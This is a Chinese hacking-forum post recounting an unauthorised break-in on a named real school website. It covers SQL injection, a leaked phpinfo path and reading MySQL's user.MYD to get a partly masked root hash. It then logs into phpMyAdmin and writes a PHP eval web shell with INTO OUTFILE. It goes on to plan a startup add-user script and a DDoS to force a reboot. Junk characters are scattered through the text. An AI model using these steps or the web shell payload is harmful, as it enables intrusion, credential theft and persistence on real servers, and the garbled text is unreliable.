第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏7 R$ |, F; M) N8 v# R0 \
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
8 I% w+ w8 F& ], s+ t5 z s
$ r7 y0 y. C0 f4 a
, y( j2 a# P' D6 S* Z
- Z& x4 r* h! G0 E. \常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 0 N, }% D2 I Y0 V
# K' B7 G; H) h) s2 k( ^3 Z" k
那么想可以直接写入shell ,getshell有几个条件:4 ^% b K. j4 L' r1 n4 N( y
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
8 p1 A& R, m& \% m$ v6 `) q: B' G5 O. g7 I$ H# W
试着爆绝对路径: g* y' j! w/ [9 b' D
1./phpMyAdmin/index.php?lang[]=1 7 g; X H) y! O. F) a$ p6 Q: F; I6 U+ [
2./phpMyAdmin/phpinfo.php
. @; u; k# C4 J0 @, v3./load_file() 7 }9 Z, M9 h" G& B
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
+ k7 e7 \2 V/ a; i5./phpmyadmin/libraries/select_lang.lib.php
: n5 i C* P7 V L* _" Q6./phpmyadmin/libraries/lect_lang.lib.php ( S7 w! |4 V* V. O& ~( Y
7./phpmyadmin/libraries/mcrypt.lib.php
# m/ _5 B# Y* q& l5 c) C( |4 N8./phpmyadmin/libraries/export/xls.php
3 k; h! m) |1 ]) r' }4 q9 x8 d3 S: Q. H; Y3 x9 {
均不行........................... 2 j7 M# m- `9 v* |" B7 K \$ y1 F
- _; c& O9 a3 }4 o御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
6 E2 _* M2 ]( R& x: Q) j/ o! { X" c
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 m# H6 E c$ G5 _
4 z( h5 F* G% q! J
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 : B3 P# y3 k0 t8 O( n7 Z
: F4 I2 ^5 U% X0 `4 X敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
9 ^* f; w) Q# w+ t5 r/ |. [9 y( I; M* F5 F4 Z& N7 u! g
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell + X; B- ]" x% e
% L" j& V% L8 W+ z$ W- Jhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
' n/ o/ Z% ]! i; \7 V& V4 v" _* \0 A' b( k3 i1 j
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ( J. w4 o, C' U/ z/ S
& Q0 P- `# c0 N9 f. g3 z3 T, ]9 C
成功读到root密码:
$ R- F/ J V" w! O o" {! S
; R- {% M+ y2 ]) I7 h( t$ S- R6 ~17---- r(0072) 6 \ p M1 q* z, C
18---- o(006f)
, G+ U% e& u3 W- H8 J* P6 ^" a19---- o(006f)
3 B5 _: ^7 h# _0 W. x5 y20---- t(0074)
$ ]" s! i$ L+ O4 P6 p+ f& B* L21---- *(002a)
) b1 g q( Q, B& B$ \; b22---- 8(0038) * t H7 O, _; g8 X5 P/ s/ U l
23---- 2(0032)
1 k+ }0 w: E+ O0 @4 ?24---- E(0045) 8 k; Z+ L, a* H( Z$ P" ]5 O
25---- 1(0031)
7 p. p- v" M8 o0 F# ]& R26---- C(0043)
2 J5 w+ r+ Z4 v- T+ p/ [27---- 5(0035)
7 Q) ]# ?# H4 g& ^4 z/ z' v28---- 8(0038)
p5 K" o+ ?+ _* R2 H+ P29---- 2(0032)
' q# z0 |/ q3 l& A30---- 8(0038) 8 K6 y# D/ B: a- Z
31---- A(0041)
! E/ l& Z L. r+ m3 i& k. z1 L0 T0 y32---- 9(0039) " _- M$ {9 I& s1 l7 k
33---- B(0042) 2 d+ q# _% |0 J7 D
34---- 5(0035) 7 y, B% l/ n. i- [
35---- 4(0034)
7 i" F* A$ c) z+ W% ?4 z5 f36---- 8(0038)
: v( n4 Z$ ?1 H$ r, Z/ I7 u% A37---- 6(0036) & c5 ]6 [* j, g; l
38---- 4(0034) 8 P# I8 f/ j; y$ c
39---- 9(0039) . q/ u; K6 q. ?
40---- 1(0031)
% t D+ g" s7 l, E; G4 A41---- 1(0031)
$ f" b7 s! f" A( j" N; n* N7 h1 R42---- 5(0035) - F$ o7 V# }4 I4 m
43---- 3(0033)
: c. d( l* j7 O: W7 w* ^$ h44---- 5(0035)
: ~. b7 _! O( W0 T1 e0 C* W( ?45---- 9(0039) # d; I6 w8 g$ O' \" M; Y
46---- 8(0038)
- [+ ~6 g0 e6 |" _, G* t47---- F(0046) 0 l; P' I) S, O' R) J
48---- F(0046) 2 n+ [, C# E- k3 x+ i6 x4 ?
49---- 4(0034)
+ n% j% a B. i4 w, b( Y0 c3 @9 |50---- F(0046)
$ j ~ x* u0 @: d51---- 0(0030)
K# d/ ^" h& u9 _9 `52---- 3(0033) % Q/ ` F6 e3 K6 R
53---- 2(0032) $ S: b6 H9 s+ w Q, R
54---- A(0041)
: G0 a, K' m: y- D7 f& G5 p55---- 4(0034) 5 e$ U1 ^ t% c3 {. h6 S
56---- A(0041)
0 \; I' b1 h: W( F. k+ D57---- B(0042) . P9 j+ A& @6 S4 l' g. w" P: h9 ?
58---- *(0044) 7 s% {6 h7 }5 ^' x2 N
59---- *(0035)
& p7 C: T0 h0 i7 R60---- *(0041) 2 W! z% R* V# q4 `
61---- *0032) - M& \! b; U& S# v4 ?
$ u" i# ]3 J0 M8 c1 ^2 b4 x
解密后成功登陆phpmyamin , S: S. {2 S+ Z& x; g
0 x# s3 ]" f6 I$ g3 q2 ]( o4 z; E3 a3 x; U- c; `6 A* p
- I# A3 C/ Y- `, m
! E; A+ I) A8 K4 Q6 @
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
! ?& D7 n+ T" w1 R, X. S. i
3 Z& Q* e" u6 Y2 q' N) k成功执行,拿下shell,菜刀连接:
* C- w' r& [; `/ X3 z. z+ N# ?# {0 j2 A
服务器不支持asp,aspx,php提权无果...................
( l0 M" [; q) H& P6 F" N- Q4 x, X2 e
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
8 Y6 I7 ~. a% k% \ B( j! W8 w服务器上已经有个隐藏帐号了 $ [& a- z0 Y M' m, |
别名 administrators. Y) E! Y( r+ w z0 u
注释 管理员对计算机/域有不受限制的完全访问权
! m4 H/ l$ n) j% S8 s成员
# t; L. J3 a) ?, H# ^-------------------------------------------------------------------------------9 M9 \; T4 u. s# f) N" e
admin
, k; h9 G5 S/ L+ yAdministrator
2 x6 |3 a, f, v/ y' hslipper$( k6 \7 f1 U, D: _+ h! x" ?4 }
sqluser
9 o: F. F; x7 f3 w) [, V! q命令成功完成。
0 C- R& W; p, }: H; T
' r6 O! ?. u3 ~( i5 }) |服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。7 r- S" W0 L+ J% S& @$ S! g
- ?% e$ \5 o. n! s3 x1 Cddos服务器重启,不然就只能坐等服务器重启了...............................
% _% d- k$ R# I; Y( v# ]
1 U }1 Q/ b# ?- ~3 p 3 _* ?3 ^* g+ { d* \
| 
发表于 2013-1-11 21:32:15
收藏
分享
支持
反对
发表于 2013-5-20 15:28:12
